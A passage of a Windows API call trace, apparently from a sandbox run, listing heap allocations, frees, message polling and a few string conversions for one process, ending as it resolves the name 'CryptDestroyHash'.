Size=0x10) returned 0x34aa508 [0188.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0188.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0188.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0188.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.721] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0188.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.721] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0188.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.722] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0188.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0188.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0188.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa790 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.724] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0188.724] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.725] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.725] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.725] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0188.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0188.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0188.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0188.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0188.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, 